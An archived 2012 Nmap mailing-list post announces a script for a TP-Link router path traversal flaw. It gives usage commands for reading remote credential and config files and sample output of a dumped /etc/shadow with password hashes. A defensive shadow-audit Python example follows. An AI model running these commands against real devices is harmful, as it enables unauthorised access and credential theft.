Nmap Development mailing list archives
http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models
From: Paulino Calderon <paulino () calderonpale com>
Date: Thu, 28 Jun 2012 00:48:44 -0500
-------- Original Message --------
Subject: http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models
Date: Thu, 28 Jun 2012 00:25:17 -0500
From: Paulino Calderon <paulino () calderonpale com>
To: Nmap Dev <nmap-dev () insecure org>

Hi list,

description = [[
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files.

This vulnerability was confirmed in models WR740N and WR740ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.

Advisory:
* http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740

Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]

---
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-tplink-dir-traversal:
-- |   VULNERABLE:
-- |   Path traversal vulnerability in several TP-Link wireless routers
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
-- |       This vulnerability can be exploited without authenticatication.
-- |       Confirmed vulnerable models: WR740N, WR740ND
-- |       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,WR2543ND,MR3220,MR3020,WR841N.
-- |     Disclosure date: 2012-06-18
-- |     Extra information:
-- |       /etc/shadow :
-- |
-- |   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   bin::10933:0:99999:7:::
-- |   daemon::10933:0:99999:7:::
-- |   adm::10933:0:99999:7:::
-- |   lp:*:10933:0:99999:7:::
-- |   sync:*:10933:0:99999:7:::
-- |   shutdown:*:10933:0:99999:7:::
-- |   halt:*:10933:0:99999:7:::
-- |   uucp:*:10933:0:99999:7:::
-- |   operator:*:10933:0:99999:7:::
-- |   nobody::10933:0:99999:7:::
-- |   ap71::10933:0:99999:7:::
-- |
-- |     References:
-- |_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
--
-- @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd
-- @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location.
--

--
Paulino Calderón Pale
Website: http://calderonpale.com
Twitter: http://twitter.com/calderpwn
Attachment:
http-tplink-dir-traversal.nse
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
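
Added example (not part of the original post or of the NSE script): a defender-side audit of the /etc/shadow lines shown in the @output block of the message, flagging empty password fields, legacy md5crypt hashes, empty salts and hashes shared between accounts. The function names and the choice of sample lines are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample: shadow lines taken from the @output block, "-- | " prefix stripped.
SAMPLE = """\
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
ap71::10933:0:99999:7:::
"""

CRYPT_SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}

def classify(field):
    """Return (state, scheme, salt) for a shadow password field."""
    if field == "":
        return ("empty", None, None)        # no password set on the account
    if field[0] in "*!":
        return ("locked", None, None)       # password login disabled
    if field.startswith("$"):
        parts = field.split("$")            # ['', id, salt, hash]
        if len(parts) >= 4:
            return ("hashed", CRYPT_SCHEMES.get(parts[1], "unknown"), parts[2])
    return ("hashed", "des-or-unknown", None)

def audit(text):
    """Parse shadow lines and return a sorted list of (account, finding)."""
    findings, by_hash = [], defaultdict(list)
    for line in text.splitlines():
        cols = line.strip().split(":")
        if len(cols) < 2 or not cols[0]:
            continue                        # skip blank or malformed lines
        user, field = cols[0], cols[1]
        state, scheme, salt = classify(field)
        if state == "empty":
            findings.append((user, "empty password field"))
        elif state == "hashed":
            by_hash[field].append(user)
            if scheme == "md5crypt":
                findings.append((user, "legacy md5crypt hash"))
            if salt == "":
                findings.append((user, "empty salt"))
    for users in by_hash.values():          # identical hash on several accounts
        if len(users) > 1:
            findings += [(u, "hash shared across: " + ",".join(users)) for u in users]
    return sorted(findings)

if __name__ == "__main__":
    print("\n".join(f"{u}: {f}" for u, f in audit(SAMPLE)))
```
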